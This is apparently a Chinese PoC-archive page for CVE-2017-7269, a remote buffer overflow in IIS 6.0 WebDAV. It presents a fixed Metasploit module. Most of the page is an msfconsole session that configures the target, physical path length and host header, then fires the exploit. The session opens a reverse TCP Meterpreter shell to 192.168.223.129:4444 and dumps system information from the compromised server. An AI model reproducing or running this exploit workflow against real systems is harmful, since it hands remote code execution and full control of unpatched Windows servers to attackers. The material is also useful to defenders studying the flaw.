POC详情: 33482b9142bf34ecd155378d075564428ff52f26

来源
关联漏洞
标题: Microsoft Internet Information Services 缓冲区错误漏洞 (CVE-2017-7269)
描述:Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数存在缓冲区溢出漏洞。远程攻击者可通过发送特制的PROPFIND请求利用该漏洞执行任意代码。
描述
fixed msf module for cve-2017-7269
介绍
### fixed msf module for cve-2017-7269

fix not work when length of physical path not equal to 19,or has a host binding.

add options: `PhysicalPathLength`,`HttpHost`

for test:
host phyiscal path: `c:\inetpub\` , length=`11`

    
    msf > use exploit/windows/iis/cve-2017-7269
    msf exploit(cve-2017-7269) > show options
    
    Module options (exploit/windows/iis/cve-2017-7269):
    
       Name                Current Setting  Required  Description
       ----                ---------------  --------  -----------
       HttpHost            localhost        yes       http host for target
       PhysicalPathLength  19               yes       length of physical path for target(include backslash)
       RHOST                                yes       The target address
       RPORT               80               yes       The target port (TCP)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Microsoft Windows Server 2003 R2
    
    
    msf exploit(cve-2017-7269) > set rhost 192.168.223.130
    rhost => 192.168.223.130
    msf exploit(cve-2017-7269) > set rport 8088
    rport => 8088
    msf exploit(cve-2017-7269) > set physicalpathlength 11
    physicalpathlength => 11
    msf exploit(cve-2017-7269) > set httphost zcgonvh-test.com
    httphost => zcgonvh-test.com
    msf exploit(cve-2017-7269) > exploit

    [*] Started reverse TCP handler on 192.168.223.129:4444 
    [*] Sending stage (957487 bytes) to 192.168.223.130
    [*] Meterpreter session 1 opened (192.168.223.129:4444 -> 192.168.223.130:1135) at 2017-03-30 18:13:41 -0400

    meterpreter > sysinfo
    Computer        : ZCG-AA4B4E60208
    OS              : Windows .NET Server (Build 3790, Service Pack 2).
    Architecture    : x86
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 3
    Meterpreter     : x86/windows
    meterpreter > 

    


文件快照
 [4.0K]  /data/pocs/33482b9142bf34ecd155378d075564428ff52f26
├── [4.4K]  cve-2017-7269.rb
└── [1.9K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。